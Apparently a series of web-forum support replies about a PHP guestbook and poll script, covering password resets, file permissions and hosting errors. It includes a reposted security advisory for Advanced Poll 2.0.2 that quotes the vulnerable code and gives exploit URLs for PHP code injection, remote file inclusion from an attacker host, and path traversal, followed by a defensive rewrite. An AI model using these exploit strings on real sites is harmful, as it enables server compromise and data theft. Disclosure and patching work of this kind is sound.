Hi Trevor,
Take a look here
|
|
|
Seems the exploit was possible through a bug in the PHP version you use.
So if your hosting company has the latest version, then the bug doesn't work.
|
|
|
You will need PHPadmin for this.
To reset your password:
Select the Guestbook database.
Now, on the right side of the screen, select SQL.
Now insert in the Data Entry Field the following lines:
And click "GO"
This will reset your account to:
User name: test
Password: 123
Also read this topic: http://proxy2.de/forum/viewtopic.php?t=3037
|
|
|
www.starelement.com works for me.
And yes both the guestbook tutorials are made by me
If it's correct they should be the same.
Yep they are both version 1.4 and that's the latest version.
|
|
|
Login as an admin and use:
To check your environmental variables, click here.
and then look if "file_uploads" is on.
If it's on, this means you can upload files; if it's off, you can't.
|
|
|
Auron, JTD and Brianr
Thanks guys, and good luck with the rest.
@ Auron: I love the new design you made
|
|
|
Thanks Yumiko.
But I’m stopping my support and development for the guestbook, because I have some other obligations and priorities.
So you will not find any help anymore at Procaz.
|
|
|
|
|
|
Use the search button:
http://proxy2.de/forum/viewtopic.php?t=2934&highlight=reset+password
|
|
|
The link doesn't work, and when I go to the root (http://www.z-gal.com/)
I get this error:
Warning: main(./conf_global.php): failed to open stream: No such file or directory in /home/z-gal/public_html/index.php on line 93
|
|
|
FrontPage doesn't support PHP.
|
|
|
It seems there is also a bug in Advanced Poll 2.0.2:
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
comments.php :
------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");
for ($i=0;$i<sizeof($register_poll_vars);$i++) {
if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
} else {
eval("\$$register_poll_vars[$i] = '';");
}
}
[...]
------------------------------------------------------------------------------------------------------
booth.php, png.php :
---------------------------------------------------------------
<?php
$include_path = dirname(__FILE__);
if ($include_path == "/") {
$include_path = ".";
}
if (!isset($PHP_SELF)) {
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}
require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------
poll_ssi.php, popup.php :
----------------------
include "./booth.php";
----------------------
admin/common.inc.php :
---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}
$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------
In the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
:
------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);
require "./common.inc.php";
[...]
------------------------------------
misc/info.php :
-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------
Exploits :
°°°°°°°°
- if magic_quotes_gpc=OFF :
http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//
or with a POST form or cookies.
- This will only work if register_globals=OFF (this is not an error...) :
http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php
- This will work if register_globals=OFF OR ON :
http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.
The same hole can be found, in the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view
- http://[target]/misc/info.php will show the phpinfo().
Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .
Credits :
°°°°°°°°
frog-mn
http://www.phpsecure.info
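The two root causes in the advisory above are eval() on request input and emulating register_globals by copying every GET/POST/cookie key into a global, which lets the request overwrite $include_path, $base_path and $pollvars[lang]. Below is an added example of how those two spots can be rewritten defensively; it is not the Advanced Poll project's code or the phpsecure.info patch, and the language allowlist and function names are assumptions for illustration.

```php
<?php
// Added example (not Advanced Poll's own code). Variable names such as
// $register_poll_vars, $base_path and $pollvars come from the advisory's
// quoted snippets; the allowlist of language files is an assumption.

// 1. comments.php: register request parameters WITHOUT eval(). The original
//    interpolated untrusted input into PHP source and evaluated it, so any
//    value containing `";` closed the string literal and ran the remainder
//    as code. Plain array assignment never executes anything.
function register_poll_vars(array $names, array $get, array $post): array {
    $vars = [];
    foreach ($names as $name) {
        if (isset($post[$name]) && is_string($post[$name])) {
            $vars[$name] = trim($post[$name]);
        } elseif (isset($get[$name]) && is_string($get[$name])) {
            $vars[$name] = trim($get[$name]);
        } else {
            $vars[$name] = '';
        }
    }
    return $vars;   // data only; nothing here is evaluated
}

// 2. booth.php / admin/common.inc.php: the directory used by require/include
//    must come from the file system, never from the request. The language
//    file is reduced to a basename, checked against an allowlist, and the
//    resolved path is confirmed to lie inside the lang directory.
function safe_lang_file(string $base_path, string $requested): string {
    $allowed = ['english.php', 'german.php'];   // assumed allowlist
    $file = basename($requested);                // drops any ../ or / prefix
    if (!in_array($file, $allowed, true)) {
        $file = 'english.php';
    }
    $root = realpath($base_path . '/lang');
    $path = realpath($base_path . '/lang/' . $file);
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return $base_path . '/lang/english.php';  // safe default
    }
    return $path;
}

$include_path = dirname(__FILE__);   // derived from the script, not from $_GET
$base_path    = dirname($include_path);
$vars = register_poll_vars(['id', 'template_set', 'action'], $_GET, $_POST);
$lang = (isset($_GET['pollvars']['lang']) && is_string($_GET['pollvars']['lang']))
    ? $_GET['pollvars']['lang'] : 'english.php';
include safe_lang_file($base_path, $lang);
```

With this structure, neither ?include_path=http://... nor ?base_path=..&pollvars[lang]=../../... can change which file is included, regardless of the register_globals or magic_quotes_gpc setting.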
|
|
|
Hi,
Amber222 is right, most of the time this is a chmod question.
You shouldn't set Memorial to 777, because you give everybody write permission to your root directory.
Here is how I have the chmod setup:
admin 755
doc 755
img 755
lang 755
lib 755
public 777
templates 777
tmp 777
|
|
|
Messages such as 'Thankyou for stopping by my site...' are contained in the file english.php in the lang sub-directory.
|
|
|
No known exploits yet (as far as I know).
|
|
|